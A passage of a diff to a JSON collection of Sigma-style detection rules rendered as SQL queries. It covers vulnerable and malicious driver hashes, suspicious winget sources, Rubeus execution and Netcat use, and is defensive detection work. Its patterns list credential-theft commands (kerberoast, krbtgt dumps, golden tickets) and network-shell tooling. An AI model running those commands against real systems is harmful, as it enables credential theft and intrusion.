'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', '2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', 
'49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', '4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 
'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', '509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', 
'9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', 
'80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', 
'06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', 
'082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 
'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 
'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver 
often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE 
'%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 